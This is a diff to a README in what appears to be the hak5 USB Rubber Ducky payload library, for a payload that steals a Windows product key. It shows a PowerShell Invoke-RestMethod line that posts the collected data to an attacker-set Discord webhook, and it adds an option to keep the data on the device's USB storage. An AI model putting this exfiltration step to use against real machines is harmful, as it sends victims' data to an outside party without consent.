hak5/usbrubberducky-payloads/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md

 The acquired information is stored in the `$exfiltration` variable, which is subsequently used to create the `$payload` object.
 This object is then utilized for exfiltration via a Discord Webhook.

-**Exfiltration**:
+**Exfiltration via Discord Webhook**:

+The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution.

 ```powershell
 Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
 ```

-The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution.
+**Exfiltration via USB Rubber Ducky Storage**:

+If you use the exfiltration method set up to retain data using Rubber Ducky's USB storage, you will not have to make any changes.

 ## Product Key Types